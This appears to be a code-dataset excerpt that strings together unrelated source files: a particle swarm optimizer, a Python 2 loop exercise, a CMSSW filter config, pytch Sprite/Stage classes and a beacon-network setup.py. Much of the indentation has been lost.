v_mins = [-x for x in v_maxs]
    # initialization
    vel = np.zeros((popsize, dim)) # initial velocities
    pBestVals = np.zeros(popsize) # best value found by each particle so far
    pBestVals.fill(float('inf')) # minimization, so initialize to +inf
    pBest = np.zeros((popsize, dim)) # best position found by each particle so far
    gBest = np.zeros(dim) # global best position
    gBestVal = float('inf') # global best value
    pos = rand_init(popsize, dim, x_lb, x_ub) # random initialization of the particles
    # record the convergence process
    convergence_curve = np.zeros(max_iter) # global best value per iteration
    convergence_curve_mean = np.zeros(max_iter) # mean value per iteration
    # iterative optimization
for l in range(0, max_iter):
        # clip positions to the search bounds
pos = np.clip(pos, x_lb, x_ub)
fvals_mean = 0
for i in range(0, popsize):
            fval = objf(pos[i, :], **kwargs) # objective function value
            fvals_mean = (fvals_mean*i + fval) / (i+1)
            # update each particle's personal (local) best
            if pBestVals[i] > fval:
                pBestVals[i] = fval
                pBest[i, :] = pos[i, :].copy()
            # update the global best
            if gBestVal > fval:
                gBestVal = fval
                gBest = pos[i, :].copy()
        # update w (the inertia factor; larger values favour global search)
        if not w_fix:
            # w decreases linearly; other update schemes could also be used
w = w_max - l * ((w_max - w_min) / max_iter)
else:
if not 0 < w_fix < 1:
raise ValueError('固定惯性因子w范围应该在(0, 1)内!')
w = w_fix
        # # velocity and position update (elementwise loop version)
        # for i in range(0, popsize):
        #     for j in range (0, dim):
        #         r1 = random.random()
        #         r2 = random.random()
        #         # velocity update
        #         vel[i, j] = w * vel[i, j] + \
        #                     c1 * r1 * (pBest[i, j] - pos[i,j]) + \
        #                     c2 * r2 * (gBest[j] - pos[i, j])
        #         # clip the velocity
        #         if vel[i, j] > v_maxs[j]:
        #             vel[i, j] = v_maxs[j]
        #         if vel[i, j] < v_mins[j]:
        #             vel[i, j] = v_mins[j]
        #         # position update
        #         pos[i, j] = pos[i, j] + vel[i, j]
        # vectorized velocity and position update
        r1 = np.random.random(size=(popsize, dim))
        r2 = np.random.random(size=(popsize, dim))
        # velocity update
        vel = w * vel + c1 * r1 * (pBest - pos) + c2 * r2 * (gBest - pos)
        vel = np.clip(vel, v_mins, v_maxs) # clip the velocity
        pos = pos + vel # position update
        # record the best objective value at every iteration
convergence_curve[l] = gBestVal
convergence_curve_mean[l] = fvals_mean
if nshow:
if (l+1) % nshow ==0:
opter_name = func_opter_parms.parms_opter['opter_name']
func_name = func_opter_parms.parms_func['func_name']
logger.info('{} for {}, iter: {}, '.format(opter_name, func_name, l+1) + \
'best fval: {}'.format(gBestVal))
    # update func_opter_parms
end_tm = time.time()
func_opter_parms.set_end_time(time.strftime('%Y-%m-%d %H:%M:%S'))
func_opter_parms.set_exe_time(end_tm-strt_tm)
func_opter_parms.set_convergence_curve(convergence_curve)
func_opter_parms.set_convergence_curve_mean(convergence_curve_mean)
func_opter_parms.set_best_val(gBestVal)
func_opter_parms.set_best_x(gBest)
return func_opter_parms
if __name__ == '__main__':
import pandas as pd
from dramkit.optimizer.base_funcs import TestFuncs
from dramkit.optimizer.utils_heuristic import FuncOpterInfo
from dramkit import plot_series, simple_logger
from dramkit.logtools.logger_general import get_logger
from dramkit.logtools.utils_logger import close_log_file
strt_tm = time.time()
objf = TestFuncs.ackley
parms_func = {'func_name': objf.__name__,
'x_lb': -10, 'x_ub': 10, 'dim': 10, 'kwargs': {}}
parms_opter = {'opter_name': 'pso-test',
'popsize': 30, 'max_iter': 500,
'v_maxs': 5, 'w_max': 0.9, 'w_min': 0.2, 'w_fix': False,
'c1': 2, 'c2': 2}
# logger = simple_logger()
logger = get_logger('./test/log/pso_test.txt', screen_show=True)
# parms_log = {'logger': logger, 'nshow': 10}
parms_log = {'logger': logger, 'nshow': 100}
func_opter_parms = FuncOpterInfo(parms_func, parms_opter, parms_log)
func_opter_parms = pso(objf, func_opter_parms)
vals = pd.DataFrame({'fval_best': func_opter_parms.convergence_curve,
'fval_mean': func_opter_parms.convergence_curve_mean})
plot_series(vals, {'fval_best': '-r', 'fval_mean': '-b'}, figsize=(10, 6))
best_x = func_opter_parms.best_x
func_opter_parms.parms_log['logger'].info('best x: {}'.format(best_x))
close_log_file(logger)
print('used time: {}s.'.format(round(time.time()-strt_tm, 6)))
| 2.109375 | 2 |
PythonTest/t32.py | Hyyyyyyyyyy/acm | 0 | 12796247 | <gh_stars>0
the_count = [1,2,3,4,5]
fruits = ['apple','orange','pear','apricot']
change = [1,'pennies',2,'dimes',3,'quarters']
for num in the_count:
print "This is count %d" % num
for i in fruits:
print "A fruit of type: %s" % i
for i in change:
print "I got %r" % i
elements = []
j = "5"
for i in range(0, 6):
print "Adding ", i, j, " to the list"
elements.append(i)
for i in elements:
print "Element was : %d" % i
| 3.6875 | 4 |
RecoLocalTracker/SubCollectionProducers/python/ClusterMultiplicityFilter_cfi.py | ckamtsikis/cmssw | 852 | 12796248 | <gh_stars>100-1000
import FWCore.ParameterSet.Config as cms
tifClusterFilter = cms.EDFilter("ClusterMultiplicityFilter",
MaxNumberOfClusters = cms.uint32(300),
ClusterCollection = cms.InputTag('siStripClusters')
)
| 1.15625 | 1 |
src/lib/pytch/actor.py | Liampobob/pytch-vm | 0 | 12796249 | <gh_stars>0
from pytch.syscalls import (
play_sound,
registered_instances,
wait_seconds,
)
from pytch.project import FRAMES_PER_SECOND
def _is_number(x):
return isinstance(x, int) or isinstance(x, float)
class Actor:
Sounds = []
_appearance_names = None
def start_sound(self, sound_name):
play_sound(self, sound_name, False)
def play_sound_until_done(self, sound_name):
play_sound(self, sound_name, True)
@classmethod
def ensure_have_appearance_names(cls):
if cls._appearance_names is None:
cls._appearance_names = [
appearance.label for appearance in cls._Appearances
]
def switch_appearance(self, appearance_name_or_index):
self.ensure_have_appearance_names()
if isinstance(appearance_name_or_index, str):
appearance_name = appearance_name_or_index
if appearance_name not in self._appearance_names:
raise KeyError('could not find {} "{}" in class "{}"'
.format(self._appearance_hyponym,
appearance_name,
self.__class__.__name__))
self._appearance_index = self._appearance_names.index(appearance_name)
elif isinstance(appearance_name_or_index, int):
appearance_index = appearance_name_or_index
if appearance_index < 0:
raise ValueError(
('could not switch to {} number {} in class "{}":'
                     ' number cannot be negative')
.format(self._appearance_hyponym,
appearance_index,
self.__class__.__name__))
n_appearances = len(self._appearance_names)
if appearance_index >= n_appearances:
raise ValueError(
                    ('could not switch to {0} number {1} in class "{2}":'
                     ' it only has {3} {0}s')
.format(self._appearance_hyponym,
appearance_index,
self.__class__.__name__,
n_appearances))
self._appearance_index = appearance_index
else:
raise ValueError(
('could not switch {} in class "{}":'
' argument must be string or integer')
.format(self._appearance_hyponym,
self.__class__.__name__))
def next_appearance(self, n_steps):
if not isinstance(n_steps, int):
raise ValueError("n_steps must be integer")
if len(self._Appearances) == 0:
raise ValueError(
                ('could not move to next {0} in class "{1}":'
                 ' it has no {0}s')
.format(self._appearance_hyponym, self.__class__.__name__)
)
self._appearance_index += n_steps
self._appearance_index %= len(self._Appearances)
@property
def appearance_number(self):
return self._appearance_index
@property
def appearance_name(self):
self.ensure_have_appearance_names()
return self._appearance_names[self._appearance_index]
class Sprite(Actor):
Costumes = [
('question-mark',
'question-mark.png', 16, 16),
]
_appearance_hyponym = 'Costume'
def __init__(self):
self._x = 0
self._y = 0
self._size = 1.0
self._speech = None
at_least_one_Costume = len(self._Appearances) != 0
if hasattr(self, "start_shown"):
if self.start_shown and not at_least_one_Costume:
raise ValueError("start_shown is set,"
" but there are no Costumes")
self._shown = self.start_shown
else:
self._shown = at_least_one_Costume
if at_least_one_Costume:
self._appearance_index = 0
else:
# It is not necessarily an error to have no Costumes, as
# long as the Sprite always remains hidden. It might, for
# example, only receive/broadcast messages or play sounds.
self._appearance_index = None
@classmethod
def the_original(cls):
return registered_instances(cls)[0]
@classmethod
def all_clones(cls):
return registered_instances(cls)[1:]
@classmethod
def all_instances(cls):
return registered_instances(cls)
def go_to_xy(self, x, y):
self._x = x
self._y = y
def get_x(self):
return self._x
def set_x(self, x):
self._x = x
def change_x(self, dx):
self._x += dx
def get_y(self):
return self._y
def set_y(self, y):
self._y = y
def change_y(self, dy):
self._y += dy
def glide_to_xy(self, destination_x, destination_y, seconds):
destination_is_number = (
_is_number(destination_x) and _is_number(destination_y)
)
if not destination_is_number:
raise ValueError("destination coordinates must be numbers")
if not _is_number(seconds):
            raise ValueError("'seconds' must be a number")
if seconds < 0:
raise ValueError("'seconds' cannot be negative")
n_frames = max(int(seconds * FRAMES_PER_SECOND), 1)
start_x = self._x
start_y = self._y
# On completion, we must be exactly at the target, and we want
# the first frame to involve some movement, so count from 1 up
# to n_frames (inclusive) rather than 0 up to n_frames - 1.
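        # Worked example (illustrative numbers only; the real value of
        # FRAMES_PER_SECOND comes from pytch.project): if it were 10 and
        # seconds were 0.5, n_frames would be 5 and t would take the values
        # 0.2, 0.4, 0.6, 0.8, 1.0, so the last frame lands exactly on the
        # destination.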
for frame_idx in range(1, n_frames + 1):
t = frame_idx / n_frames # t is in (0.0, 1.0]
t_c = 1.0 - t # 'complement'
x = t * destination_x + t_c * start_x
y = t * destination_y + t_c * start_y
self.go_to_xy(x, y)
wait_seconds(0) # No auto-yield (we don't do "import pytch")
def set_size(self, size):
self._size = size
def show(self):
if not self.Costumes:
# See comment in __init__().
raise RuntimeError('cannot show a Sprite with no Costumes')
self._shown = True
def hide(self):
self._shown = False
def switch_costume(self, costume_name):
self.switch_appearance(costume_name)
def next_costume(self, n_steps=1):
self.next_appearance(n_steps)
@property
def costume_number(self):
return self.appearance_number
@property
def costume_name(self):
return self.appearance_name
def touching(self, target_class):
return (self._pytch_parent_project
.instance_is_touching_any_of(self, target_class))
def delete_this_clone(self):
self._pytch_parent_project.unregister_actor_instance(self)
def move_to_front_layer(self):
(self._pytch_parent_project
.move_within_draw_layer_group(self, "absolute", -1))
def move_to_back_layer(self):
(self._pytch_parent_project
.move_within_draw_layer_group(self, "absolute", 0))
def move_forward_layers(self, n_layers):
(self._pytch_parent_project
.move_within_draw_layer_group(self, "relative", n_layers))
def move_backward_layers(self, n_layers):
(self._pytch_parent_project
.move_within_draw_layer_group(self, "relative", -n_layers))
def say(self, content):
self._speech = ("say", content)
def say_nothing(self):
self._speech = None
def say_for_seconds(self, content, seconds):
self.say(content)
wait_seconds(seconds)
self.say_nothing()
class Stage(Actor):
Backdrops = [('solid-white', 'solid-white-stage.png')]
_x = 0
_y = 0
_size = 1.0
_shown = True
_speech = None
_appearance_hyponym = 'Backdrop'
def __init__(self):
if not self.Backdrops:
# In contrast to Sprites, a Stage is always shown and so
# must have at least one Backdrop.
raise ValueError('no Backdrops in Stage')
self._appearance_index = 0
@classmethod
def the_only(cls):
return registered_instances(cls)[0]
def switch_backdrop(self, backdrop_name):
self.switch_appearance(backdrop_name)
def next_backdrop(self, n_steps=1):
self.next_appearance(n_steps)
@property
def backdrop_number(self):
return self.appearance_number
@property
def backdrop_name(self):
return self.appearance_name
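
# Usage sketch (illustration only, not part of this module): a user-facing
# Sprite subclass normally just declares its Costumes and calls the methods
# defined above. The costume label, image file and centre offsets here are
# made-up example values.
#
#   class Rocket(Sprite):
#       Costumes = [("flying", "rocket.png", 32, 32)]
#
#       def launch(self):
#           self.switch_costume("flying")
#           self.go_to_xy(0, -100)
#           self.glide_to_xy(0, 120, 1.5)
#           self.say_for_seconds("Lift off!", 1.0)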
| 2.5 | 2 |
setup.py | CSCfi/beacon-network | 3 | 12796250 | <reponame>CSCfi/beacon-network<gh_stars>1-10
from setuptools import setup
setup(
name="beacon_network",
version="1.4.0",
description="Beacon Network services",
long_description_content_type="text/markdown",
project_urls={
"Source": "https://github.com/CSCfi/beacon-network",
},
author="CSC - IT Center for Science",
    classifiers=[
        "Development Status :: 4 - Beta",
        "Intended Audience :: Developers",
        "Topic :: Internet :: WWW/HTTP :: HTTP Servers",
        "License :: OSI Approved :: Apache Software License",
        "Programming Language :: Python :: 3.8",
    ],
packages=[
"aggregator",
"aggregator/config",
"aggregator/endpoints",
"aggregator/utils",
"registry",
"registry/config",
"registry/endpoints",
"registry/schemas",
"registry/utils",
],
package_data={"": ["*.json", "*.ini"]},
install_requires=[
"asyncio==3.4.3",
"aiohttp==3.8.1",
"aiohttp-cors==0.7.0",
"aiocache==0.11.1",
"aiomcache==0.6.0",
"ujson==4.3.0",
"uvloop==0.14.0; python_version < '3.7'",
"uvloop==0.16.0; python_version >= '3.7'",
"asyncpg==0.25.0",
"jsonschema==4.2.1",
"gunicorn==20.1.0",
],
extras_require={
"test": [
"coverage==6.2",
"pytest<6.3",
"pytest-cov==3.0.0",
"testfixtures==6.18.3",
"tox==3.24.4",
"flake8==4.0.1",
"flake8-docstrings==1.6.0",
"asynctest==0.13.0",
"aioresponses==0.7.2",
"black==21.12b0",
],
"docs": ["sphinx >= 1.4", "sphinx_rtd_theme==1.0.0"],
},
entry_points={
"console_scripts": ["beacon_registry=registry.registry:main", "beacon_aggregator=aggregator.aggregator:main"],
},
)
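
# Installation sketch (not part of the original file): from a source checkout
# the services would typically be installed with
#
#   pip install .                 # runtime dependencies only
#   pip install ".[test,docs]"    # plus the development extras
#
# which also exposes the beacon_registry and beacon_aggregator console scripts.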
| 1.703125 | 2 |